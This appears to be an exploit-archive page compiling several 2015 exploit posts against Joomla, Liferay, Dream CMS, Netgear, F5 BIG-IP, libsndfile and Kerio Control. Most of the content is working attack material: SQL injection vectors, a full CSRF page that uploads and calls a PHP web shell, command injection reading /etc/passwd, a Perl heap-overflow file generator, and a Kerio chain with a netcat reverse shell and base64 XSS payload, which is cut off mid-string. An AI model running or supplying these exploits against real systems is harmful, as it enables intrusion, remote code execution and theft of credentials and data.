HireHackking

# Description of component: This Joomla component is perfect for independent estate agents, property rental companies and agencies, hotel booking, hotel manage, motel booking, motel manage. ################################################################################################## # Exploit Title: [Joomla component com_realestatemanager - SQL injection] # Google Dork: [inurl:option=com_realestatemanager] # Date: [2015-10-10] # Exploit Author: [Omer Ramić] # Vendor Homepage: [http://ordasoft.com/] # Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html] # Version: [3.7] & probably all prior #Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16 ################################################################################################## #Multiple vulnerable parameters (POC given only for the first parametar): Parameter_1: order_direction (POST) Parameter_2: order_field (POST) #The vulnerable parameters 1 & 2 are within the following request: POST /index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http:// [HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 Cookie: security_level=0; 9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 37 order_direction=asc&order_field=price #Vectors: POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price ################################### # Greets to Palestine from Bosnia # ###################################

# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation # Date: 18/05/2015 # Exploit Author: Massimo De Luca - mentat.is # Vendor Homepage: https://www.liferay.com # Software Link: http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360 # Version: 6.1.0 CE # Tested on: - Explanation: Any logged user can change his "User Group" membership by editing the parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST generated when updating his profile in the page "Manage my account". This may lead to privilege escalation. Proof of Concept: POST /group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user HTTP/1.1 [...] [...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW GROUP ID]&_2_groupRolesRoleIds=[...] For your reference i'm attaching the full request in a separate file. In order to test the vulnerability on a fresh installation: - Create two different groups with different roles and permissions (ie: one with administrator permissions, and a regular user) -Create two different users,one for each group Solution: The vendor is aware of the problem and has fixed the issue in newer releases #Massimo De Luca #mdeluca [at] mentat.is #Mentat.is

<!-- Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution Vendor: Dream CMS Product web page: http://www.dream-cms.kg Affected version: 2.3.0 Summary: DreamCMS is open and completely free PHP web application for constructing websites of any complexity. Desc: Dream CMS allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Related to the CSRF issue, an authenticated arbitrary PHP code execution exist. The vulnerability is caused due to the improper verification of uploaded files in '/files-manager-administration/add-file' script via the 'file' POST parameter which allows of arbitrary files being uploaded in '/resource/filemanager/1/home/' where the admin first needs to add the file extension in the allowed list (csrf'd). This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file and execute system commands. Tested on: nginx/1.6.2 PHP/5.5.28 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5268 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php 01.10.2015 --> <html> <head> <title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title> </head> <body onload="exploitrun();"> <!-- 1. Add PHP allowed extension --> <form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0"> <input type="hidden" name="form&#95;name" value="settings" /> <input type="hidden" name="file&#95;manager&#95;allowed&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png&#44;mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv&#44;zip&#44;rar&#44;txt&#44;doc&#44;docx&#44;pdf&#44;php" /> <input type="hidden" name="file&#95;manager&#95;allowed&#95;size" value="2097152" /> <input type="hidden" name="file&#95;manager&#95;file&#95;name&#95;length" value="20" /> <input type="hidden" name="file&#95;manager&#95;image&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png" /> <input type="hidden" name="file&#95;manager&#95;media&#95;extensions" value="mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv" /> <input type="hidden" name="file&#95;manager&#95;window&#95;width" value="60" /> <input type="hidden" name="file&#95;manager&#95;window&#95;height" value="500" /> <input type="hidden" name="file&#95;manager&#95;window&#95;image&#95;height" value="300" /> <input type="hidden" name="submit" value="Save" /> </form> <!-- 2. Upload PHP file --> <script> function upload() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" + "Content-Disposition: form-data; name=\"form_name\"\r\n" + "\r\n" + "file\r\n" + "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" + "Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c?php\r\n" + "system($_GET[\"cmd\"]);\r\n" + "?\x3e\r\n" + "\r\n" + "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "Submit\r\n" + "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form name="uploadme" action="javascript:upload();" target="frame1"> </form> <!-- 3. Code execution --> <form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2"> <input type="hidden" name="cmd" value="whoami" /> </form> <iframe name="frame0"></iframe> <iframe name="frame1"></iframe> <iframe name="frame2"></iframe> <script> function exploitrun() { document.addext.submit(); document.getElementsByTagName("iframe")[0].onload = function() { document.uploadme.submit(); document.getElementsByTagName("iframe")[1].onload = function() { document.exploit.submit(); } } } </script> </body> </html>

# Exploit Title: [Netgear Voice Gateway Multiple Vulnerabilities] # Date: May 01, 2015 [No response from Vendor] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.netgear.com] # Version: [Firmware Version: V2.3.0.23_2.3.23] *Netgear Voice Gateway Multiple Vulnerabilities * *Device Info * Device Type: Netgear Voice Gateway EVG2000 Account Name: EVG2000 Firmware Version: V2.3.0.23_2.3.23 *1. Web application vulnerabilities OS Command Injection * Netgear Voice Gateway EVG2000 is managed through a web management portal. The application provides a Diagnostics feature that has four (4) options: a.Ping an IP address b.Perform a DNS Lookup c.Display the Routing Table d.Reboot the Router Option 1 Ping an IP address was confirmed to be vulnerable to OS Command Injection. The ping_IPAddr parameter does not sufficiently validate input. It is possible to use the semi-colon character (;) to inject arbitrary OS commands and retrieve the output in the application's responses. *PoC* *HTTP POST Request* POST /ping.cgi HTTP/1.1 Host: 1.3.3.7 User-Agent: blah Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Referer: http://1.3.3.7/DIAG_diag.htm Authorization: Basic <b64_value_here> Content-Length: 69 IPAddr1=1&IPAddr2=3&IPAddr3=3&IPAddr4=7&ping=Ping&ping_IPAddr=1.3.3.7;cat /etc/passwd *HTTP Response* ..... <html-output> root:<redacted_hash>:0:0:Linux User,,,:/root/:/bin/sh nobody:*:0:0nobody:/:/bin/sh admin:<clear-text-admin-pass>:0:0:admin:/:/bin/sh *2. Web application vulnerabilities Stored Cross-Site Scripting (XSS) * In the Services menu, the Service Table lists any existing Service-Port mappings. A new service can be added with a payload value of *<script>alert(xss)</script>* in the ServiceType parameter. The application does not check any malicious input and accepted this new entry. The JavaScript input was then returned unmodified in a subsequent request for the Services Table Entries. The web application lacks strict input validation and hence is vulnerable to Stored Cross-Site Scripting attack. *3. Application does not secure configured passwords (HTTP) * Any & all configured sensitive information such as passwords & keys are not secured properly. These are masked and only ***** is shown in the corresponding fields. This client-side restriction can easily be bypassed though. It is possible to capture masked values via ‘Inspect Element’ and / or via an intercepting proxy. The application should mask/censure (*****) the passwords, keys and any other crucial pieces of configuration and must not pass the values in clear-text.

# Exploit Title: [F5 BigIP File Path Traversal Vulnerability] # Discovered by: Karn Ganeshen # Reported on: April 27, 2015 # New version released on: September 01, 2015 # Vendor Homepage: [www.f5.com] # Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3] # CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040 ] # Multiple Additional F5 products & versions are Affected and documented here: https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html *Vulnerability Details* The handler parameter is vulnerable to file path manipulation attacks. When we submit a payload */tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler* parameter, the file *WEB-INF/web.xml* is returned. *PoC:* POST /tmui/Control/form HTTP/1.1 Host: <IP> Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https:// <IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2 Content-Type: application/x-www-form-urlencoded Content-Length: 1004 Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="" _timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno *...[SNIP]...* fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler= *%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml* *Web.xml is returned in the Response:* <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> *<!--Automatically created by Tomcat JspC.--><web-app>* *...[config file output redacted here]...* *.....*

#!/usr/bin/env perl # # Exploit Title: libsndfile <= 1.0.25 (latest version) Heap overflow # Date: 07 Oct 2015 # Exploit Author: Marco Romano @nemux_ # Vendor Homepage: http://www.mega-nerd.com/libsndfile/ # Version: <= 1.0.25 # Tested on: Ubuntu 15.04 / OS X El Capitan 10.11 # #################################################################### # # Author: Marco Romano (@nemux_) - 07 Oct 2015 # # PoC for libsndfile <= 1.0.25 (latest version) Heap overflow # # run ./poc.pl to make nemux.aiff file. Now it can be delivered in different ways. # # Possible attack vectors: # - Firefox (on Linux) -> SWF/Audio play -> pulseaudio -> libsndfile ?? (not tested) # - Email attachment # - TCP socket connection (for audio server only) # - File upload (ex. server side audio file manipulation, interactive voice responder) # - etc... # ----------------------------------------------------------------------------------------- # [*] Affected products: -- All products using libsndfile (a non-exhaustive list below) # # [-] PusleAudio - http://www.freedesktop.org/wiki/Software/PulseAudio/ (TESTED) # Installed by default on most linux environments with libsndfile too (Ex.: Ubuntu, Debian) # [-] Jack AudioConnectionKit- http://www.jackaudio.org (TESTED) # Available for Linux, Win, OSX (List of applications http://www.jackaudio.org/applications/) # [-] Adobe Audition - http://www.adobe.com/products/audition.html (TESTED) # [-] Audacity - http://www.audacityteam.org/ (TESTED) # [-] Asterisk-eSpeak Module - https://zaf.github.io/Asterisk-eSpeak/ (NOT TESTED) # # run an "apt-cache rdepends libsndfile1" to see other interesting dependencies # searching around i found that library is widely used on IOS and Android projects too # ------------------------------------------------------------------------------------------ # [*] libsndfile web site references # # [-] http://www.mega-nerd.com/libsndfile/ # [-] https://github.com/erikd/libsndfile.git # [-] https://en.wikipedia.org/wiki/Libsndfile # # Note: (wikipedia reports that LAME encoder depends by libsndfile too # but i didn't find this dependecy...) ######################################################################################## #### Vulnerability is based on the wrong management of the headindex and headend values. #### While parsing a specially crafted AIFF header the attacker can manage index values #### in order to use memcpy(...) to overwrite memory heap. ######################################################################################## #### # Some parts of the source code: # # -- common.c:337 [*] # ... # #define SF_STR_BUFFER_LEN (8192) # #define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN) # ... # typedef struct sf_private_tag # { # ... # ... # /* Index variables for maintaining logbuffer and header above. */ # ... # int headindex, headend ; # ... # /* Virtual I/O functions. */ # int virtual_io ; # SF_VIRTUAL_IO vio ; # ... # ... # } SF_PRIVATE; # # Take a look to the source of aiff.c: # -- git clone https://github.com/erikd/libsndfile.git # # src/aiff.c:403 # while (!done) { ... } # --> # src/common.c: # int psf_binheader_readf (SF_PRIVATE *psf, char const *format, ...) { } # --> --> # src/common.c:793 # static int header_read (SF_PRIVATE *psf, void *ptr, int bytes) # --> --> --> # src/common.c: # static int header_read(...) { # ... # memcpy (ptr, psf->header + psf->headindex, bytes) ; # psf->headindex += bytes ; # # } /* header_read */ # # Thourgh a specially crafted AIFF header we can # 1- increase and decrease the headindex value regardless what should be its real value # 2- Overwriting memory with arbitrary data... # ### Pulseudio test on x86_64 # # Starting program: /usr/bin/paplay nemux.aiff # [Thread debugging using libthread_db enabled] # Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". # Program received signal SIGSEGV, Segmentation fault. # [----------------------------------registers-----------------------------------] # RAX: 0x41414141 ('AAAA') # RBX: 0x60d3e0 --> 0x0 # RCX: 0x610a80 --> 0x0 # RDX: 0x44444444 ('DDDD') # RSI: 0x1 # RDI: 0x7ea # RBP: 0x36b0 # RSP: 0x7fffffffd958 --> 0x7ffff76cfe71 (pop rbx) # RIP: 0x41414141 ('AAAA') # ... # [-------------------------------------code-------------------------------------] # Invalid $PC address: 0x41414141 # [------------------------------------------------------------------------------] # Legend: code, data, rodata, value # Stopped reason: SIGSEGV # 0x0000000041414141 in ?? () ######### ########################################################################################## my $header_aiff_c = "\x46\x4F\x52\x4D" . ### FORM and VERSION "\x00\x00\xD0\x7C" . "\x41\x49\x46\x43" . "\x42\x56\x45\x52" . "\x00\x00\x00\x04" . "\xA2\x80\x51\x40" . "\x43\x4F\x4D\x4D" . ### COMM Chunk and Compression NONE (PCM) "\x00\x00\x00\x11" . "\x00\x01\x00\x00" . "\x00\x00\x00\x10" . "\xF3\x0C\xFA\x00" . "\x00\x00\x00\x00" . "\x00\x00\x4E\x4F" . "\x4E\x45\x0E\x6E" . "\x6F\x74\x20\x63" . "\x63\x6D\x92\x72" . "\x65\x73\x53\x65\x64\x00" . "\x53\x53\x4E\x44" . ### 2 SSND Chunks "\x00\x00\x00\x40" . "\x00\x00\x00\xAA" . "\xBD\xBD\xC5\x58" . "\xBD\x96\xCA\xB0" . "\xE9\x6F\x0A\xFE" . "\x24\xCD\x26\x65" . "\x73\x73\x65\x64" . "\x00\x53\x53\x4E" . "\x44\x00\x00\x00" . "\x40\x00\x00\x00" . "\x00\xF8\x72\xF3" . "\x59\xFB\x56\xFE" . "\x00\x00\x00\x3E" . "\xE9\x22\x66\x94" . "\x4E\x66\x55\x94" . "\x4E\xD4\xD7\xC5" . "\x42\x49\x61\xC4" . "\x43\x4F\x4D\x54" . ### 2 COMT Chunks "\x00\x00\x00\x26" . "\x00\x01\x00\x20" . "\x68\x17\x0C\x10" . "\x25\x03\x00\x10" . ### 0x2503 items "\x03\x80\xFF\x37" . "\x52\x00\x00\x00" . "\x04\xA2\x8E\x51" . "\x40\x43\x4F\x4D" . "\x54\x00\x00\x0B" . "\x26\x00\x01\x00" . "\x20\x68" . "\x17\x00\x10\x03" . ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff.c) "\x03\x00\x10\x1B" . "\x80\xFF\xFF\x4F" . "\x4E\x45\x1F\x6E" . ### my debug: heap 0x161e0d8 "\x6F\x00\x01\x00" . ### my debug: heap 0x161e0dc "\x00\xE4\x7F\x72" . ### ... "\x00\x00\x00\xD7" . "\xBA\x17\xFF\xE3" . "\x1F\x40\xFF\x20" . "\x18\x08\xDD\x18" . "\x00\x28\x00\x28" . "\x00\x28\x40\x28" . "\x00\x28\x00\x28" . "\x00\x28\xFF\xFF" . "\xFF\x80\xF7\x17" . "\x00\x18\x01\x00" . "\x20\x68\x17\x0C" . "\x10\x03\x03\x00" . "\x10\x03\x80\xFF" . "\xFF\x4F\x4E\x45" . "\x0A\x6E\x70\x00" . "\x18\xDE\x3A\x08" . "\x00\x18\x21\xA6" . "\x05\x7F\x40\x00" . "\x08\xFF\x5D\x00" . "\xF0\x00\x4F\x00" . "\x6A\xFF\x89\x9D" . "\xDA\x07\xB6\xFF" . "\x2C\x92\xB3\x0D" . "\xE4\x40\xBB\x23" . "\x00\x18\x00\x38" . "\x00\x63\x00\x28" . "\x00\x90\xFF\xFF" . "\x20\x18\x08\xDD" . "\x18\x00\x28\x00" . "\x28\x00\x5E\xFC" . "\x78\xD9\xAD\xCD" . "\x9E\x3E\xE9\x21" . "\x55\x94\x4E\x85" . "\x51\x94\x4E\xA6" . "\xD7\xC5\x42\xA7" . "\x2A\x55\xC4\x9F" . "\x43\x4F\x4D\x54" . ### here start next COMT Chunk with 0x36B0 items "\x08\x00\x00\x26" . "\x00\x01\x00\x20" . "\x68\x17\x0C\xDD" . "\x36\xB0"; #### end of header... my $file= "nemux.aiff"; if ($ARGV[0] eq "h" || $ARGV[0] eq "help") { print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n"; print "[*] Heap overflow vulnerability\n"; print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015 \n"; print "\n Just run " . $0 . " (output will be \"nemux.aiff\" file)\n\n"; exit 0; } my $eax_addr = 0x41414141; my $edx_addr = 0x44444444; ##### #### We are going to overwirte psf structure allocated in the heap ##### my $content_file = pack('Q', $eax_addr); $content_file .= "\x90" x ( 21146 - length pack('Q',$eax_addr) ); ##### ### In the psf structure we will overwrite "int virtual_io" with a true value, and vio.seek function pointer ### with an arbitrary address. ### in this way the block below will be triggred in file_io.c: ### ... ### if (psf->virtual_io) ### return psf->vio.seek (...); ### ##### my $rax_overwrite = pack('Q',$eax_addr); ### overwrite vio.seek pointer here my $padding = "\x43" x 24; ### .... my $rdx_overwrite = pack('Q',$edx_addr); ### overwrite rdx here ... my $padding_end_file = "MOMIMANHACKERNOW" x 7; ### not useful but funny... -_- print "\n[*] Making AIFF file: \"nemux.aiff\""; my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file; print "\n[*] Done... AIFF File Size: ".length($payload)."\n"; print "\nIs it over? ... Hello? ... Did we win? (cit.)\n"; open($FILE,">$file"); print $FILE $payload; close($FILE); print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity namux.aiff\n"; print "[+] You can test it on OSX Windows and Linux - with Adobe Audition"; print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n\n"; print "Marco Romano \@nemux_\n\n";

IntelliSec Security Advisory ============================================================================================== Title: Multiple Vulnerabilities in Kerio Control (Virtual Appliance) Vulnerabilities: SQL Injection, Remote Code Execution through CSRF Product: Kerio Control Homepage: http://www.kerio.com Affected Version: <= 8.6.1 Fixed Version: 8.6.2 (partially fixed) Impact: critical Date: 2015-10-12 Author: Raschin Tavakoli | IntelliSec Research http://www.intellisec.at research@intellisec.at Links: https://youtu.be/EzTI2WlGHb4 =============================================================================================== Vendor description: =================== Kerio Control is a unified threat management firewall developed by Kerio Technologies. It features intrusion prevention, content filtering, activity reporting, bandwidth management, and virtual private networking. Kerio Control runs Linux, providing network perimeter defense for small to medium organizations. Vulnerabilities =============== 1. XSS with Anti-XSS-Filter bypass (nonauth area) 2. SQL Injection (non-admin area) 3. Remote Code Execution (admin area) By chaining the vulnerabilities together in combination with user interaction, an attacker may gain full control over the firewall and the underlying network. Attack Scenario =============== The first attack could be to trick non-admin users to follow a malicious link in order to trigger a CSRF exploit via the /nonauth/certificate.php script. The script may exploit the SQL Injection flaw in reports.php for example. Once able to query the database, sensitive data of the users can be transmitted back to the attacker. Information of interest could be for example the traffic usage of admin users and their top-visited webpages. In the next attack, this information may be used to embed another CSRF exploit into one of the top-visited webpages. If the attacker succeeds and the exploit gets triggered by a visiting admin, arbitrary remote code execution will be gained. =============================================================================================== 1. SQL Injection: =============================================================================================== Short Description: ================== Kerio Control suffers from an SQL Injection flaw in the report.php script. Detailed Description: ===================== It is not necessary to use blind sql injection, as the output will be rendered into an image file. As the text in the image file has a fixed size, multiple union selects can be combined to render out multiple images containing the result text of the query. In order to exploit the issue, a user has to be authenticated. For non-admin users, webreports have to be enabled. This issue is fixed in 8.6.2 Proof of Concept: ================= GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1 Host: testbox:4081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: SESSION_CONTROL_WEBIFACE=c0fa6c207d812da1fce3e2ff2bc2e609948988a041f5a23adb64064a42010e6b; TOKEN_CONTROL_WEBIFACE For example, to read out the admin's internal UUID number, the following union based sql injection can be used: https://testbox:4081/report.php?start=16703, 0, 0) UNION SELECT 'x', 'Admin UUID: ' || substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 1 for 14), REQUESTS FROM GET_ALL_TOP_WEBS_D(16703, 1) UNION SELECT 'y', substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 15 for 40), '7' FROM GET_ALL_TOP_WEBS_D(16703, 1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+ ======================= 2. Cross Site Scripting ======================= The server parameter in the nonauth/certificate.php script suffers from an non persistent XSS vulnerability. The payload needs to be base64 encoded and will be decoded at runtime. That way it bypasses all Anti-XSS Filters of modern browsers, which increases the severity of this issue significantly. The issue has been tested with OS X Chrome Version 45.0.2454.101, OS X Safari Version 9.0 (10601.1.56.2), Linux Chromium Version 37.0.2062.120 and Linux Iceweasel 31.8.0 This issue is fixed in 8.6.2 =============================================================================================== 3. Remote Command Execution via File Upload =============================================================================================== Short Description: ================== Kerio Control suffers from a RCE vulnerability in the upgrade function in the admin interface. A malicious ssh script can be uploaded and executed with root privileges. Detail: ======= The upgrade feature in the admin interface can be used to upload arbitrary files by simply changing a tar file to the extension .img. If a tar file is created which contains a upgrade.sh shell script, this script will be executed with root privileges. Kerio did not provide a fix for the upgrade functionality yet. ======================================== 4. Remote Command Execution through CSRF ======================================== The Kerio admin interface does not provide a functionality to execute shell commands on the underlying Linux system nor a possibility to enable ssh. SSH is disabled by default and can only be enabled through the Kerio Console Application. By combining the RCE with an CSRF attack, this vulnerability becomes a serious issue. Proof of Concept: ================= Create a Bash Script: --------------------- # cat upgrade.sh # #!/bin/bash # nc 10.0.0.2 5555 -e /bin/bash & # tar czf upgrade.tar.gz * # mv upgrade.tar.gz upgrade.img Open a netcat listener on the attacker's machine 10.0.0.2: ---------------------------------------------------------- # nc -lvp 5555 Generate Javascript Payload (File Upload and Execution): -------------------------------------------------------- <script> url='http://10.0.0.1:4081/admin'; _token=""; _file=""; _id = ""; function reqListener () { obj = JSON.parse(this.responseText); file = obj.result.fileUpload.name; id = obj.result.fileUpload.id; createIFrame(file, id); } function createIFrame(file, id) { iframe=document.createElement("iframe"); iframe.src=url + "/constants.js.php"; iframe.style.display = "none"; iframe.sandbox="allow-scripts allow-same-origin"; iframe.onload=function() { cookie = iframe.contentWindow.document.cookie; var re = new RegExp(name + "=([^;]+)"); var value = re.exec(cookie); var token=(value != null) ? unescape(value[1]) : null; executeScript(file, id, token); } document.body.appendChild(iframe); } function executeScript(file, id, token) { _file = file; _id = id; _token = token; var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true); xmlhttp.setRequestHeader("X-Token", token); xmlhttp.addEventListener("load", executeScript2); xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}})); } function executeScript2(file, token) { var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true); xmlhttp.setRequestHeader("X-Token", _token); xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }})); } var xhr = new XMLHttpRequest(); xhr.open("POST", url + "/api/jsonrpc/upload/", true); xhr.addEventListener("load", reqListener); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951"); xhr.withCredentials = true; var body = "-----------------------------1038495162429835808207612951\r\n" + "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x1f\x8b\x08\x00\xe0\x6e\x02\x56\x00\x03\xed\xce\xb1\x0e\x82\x30\x10\xc6\xf1\xce\x3c\xc5\x19\x13\x37\xe1\x8a\x2d\x3e\x4f\x51\x22\x2e\x60\x5a\x78\x7f\xab\x83\x24\x0e\x3a\x11\x63\xf2\xff\xdd\xf0\x25\xf7\xdd\x70\xf3\xed\x12\xc3\xb9\x2b\x53\x6f\x56\xa3\x59\xe3\xdc\x33\xb3\xf7\x54\xf5\xce\xd8\xba\x51\x75\xcd\xf1\xe0\xf2\xde\x5a\x9f\x43\x74\xbd\x97\x16\x73\x9a\x42\x14\x31\x71\x1c\xa7\x4f\x77\xdf\xfa\x3f\xb5\xdd\x54\xed\x75\xa8\xda\x90\xfa\x62\x38\x89\xd5\xf2\x31\xb5\xf8\x4c\xf6\x9d\xbc\x5a\xd9\x15\xbf\xfe\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb8\x03\x94\x67\x18\xfa\x00\x28\x00\x00\r\n" + "-----------------------------1038495162429835808207612951--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); </script> Base64 encode and craft malicous link: https://testbox:4081/nonauth/certificate.php?server=PHNjcmlwdD4KdXJsPSdodHRwOi8vMTAuMC4wLjE6NDA4MS9hZG1pbic7Cl90b2tlbj0iIjsKX2Zp bGU9IiI7Cl9pZCA9ICIiOwpmdW5jdGlvbiByZXFMaXN0ZW5lciAoKSB7CglvYmogPSBKU09OLnBh cnNlKHRoaXMucmVzcG9uc2VUZXh0KTsKCWZpbGUgPSBvYmoucmVzdWx0LmZpbGVVcGxvYWQubmFt ZTsKCWlkID0gb2JqLnJlc3VsdC5maWxlVXBsb2FkLmlkOwoJY3JlYXRlSUZyYW1lKGZpbGUsIGlk KTsKfQpmdW5jdGlvbiBjcmVhdGVJRnJhbWUoZmlsZSwgaWQpIHsKCWlmcmFtZT1kb2N1bWVudC5j cmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKCWlmcmFtZS5zcmM9dXJsICsgIi9jb25zdGFudHMuanMu cGhwIjsKCWlmcmFtZS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwoJaWZyYW1lLnNhbmRib3g9ImFs bG93LXNjcmlwdHMgYWxsb3ctc2FtZS1vcmlnaW4iOwoJaWZyYW1lLm9ubG9hZD1mdW5jdGlvbigp IHsKCQljb29raWUgPSBpZnJhbWUuY29udGVudFdpbmRvdy5kb2N1bWVudC5jb29raWU7CgkJdmFy 